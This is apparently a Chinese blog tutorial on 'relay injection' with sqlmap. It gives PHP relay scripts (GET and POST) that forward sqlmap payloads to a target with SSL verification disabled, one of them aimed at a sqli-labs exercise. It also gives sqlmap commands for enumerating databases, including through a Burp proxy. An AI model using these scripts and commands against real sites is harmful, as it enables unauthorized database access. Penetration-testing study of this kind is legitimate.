sqlmap中转注入

当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书

python3 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.4.7#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:12:10 /2021-10-10/
[10.12.10] [INFO] parsing HTTP request from '49'
custom injection marking character ('*') found in option '--data'. Do you want to process it?  [Y/n/q]Y
[10:12:10] [INFO] testing connection to the target URL
[10:12:10] [CRITICAL] can't establish SSL connection

中转注入的原理

1. sqlmap注入本地搭建的服务器中转脚本
2. 中转脚本接收sqlmap注入过来的payload,根据配置进行编码
3. 将payload与目标地址进行拼接请求该URL

GET

将上述代码放在本地服务器中，然后访问

<?php
set_time_limit(0); 
$id=$_GET["id"]; 	//自定义使用base64_encode编码
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 
$url = "http://xxxx?&daxxtae=null&parame=$id";
echo $url;
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); //https请求 不验证hosts
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数执行如果成功只将结果返回，不自动输出任何内容。如果失败返回FALSE
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_PROXY, 'proxy.xxxx.com'); //代理服务器地址,vps可以不加
curl_setopt($ch, CURLOPT_PROXYPORT, '8080'); //代理服务器端口,vps可以不加
$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>

sqlmap

python3 sqlmap.py -u "http://127.0.0.1/shell.php?&daxxtae=null&param=xxx" --batch --delay=1 --random-agent --dbs

POST

<?php
$url = "http://192.168.1.104/sqli/Less-11/index.php";
$sql = $_GET[s];//获取中转脚本传过来的payload 
$s = urlencode($sql);
$params = "uname=admin$s&passwd=aa";
$ch = curl_init();// 创建一个新cURL资源
 curl_setopt($ch, CURLOPT_URL, $url);//这是你想用PHP取回的URL地址，可以在用curl_init()函数初始化时设置这个选项
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);//https请求 不验证hosts
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数执行如果成功只将结果返回，不自动输出任何内容。如果失败返回FALSE
curl_setopt($ch, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中，设置这个选项为一个非零值   
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');// 在HTTP请求中自定义一个”user-agent”头的字符串
curl_setopt($ch, CURLOPT_TIMEOUT, 15);//为了应对目标服务器的过载，下线，或者崩溃等可能状况。
curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
// 抓取URL并把它传递给浏览器 
$output = curl_exec($ch);
// 关闭cURL资源，并且释放系统资源
curl_close($ch);
$a = strlen($output);
//echo $a;
if($a==2846){
    echo "1";
}else{
    echo "2";
}

sqlmap

python3 sqlmap -u "http://127.0.0.1/shell.php?s=1" --dbs

代理端口

直接burpsuite代理本地8080端口，然后sqlmap通过8080端口进行访问注入,并且添加参数 --force-ssl

url?id=1 --force-ssl --proxy http://127.0.0.1:8080 --random-agent --dbs

参考链接:https://xz.aliyun.com/t/10385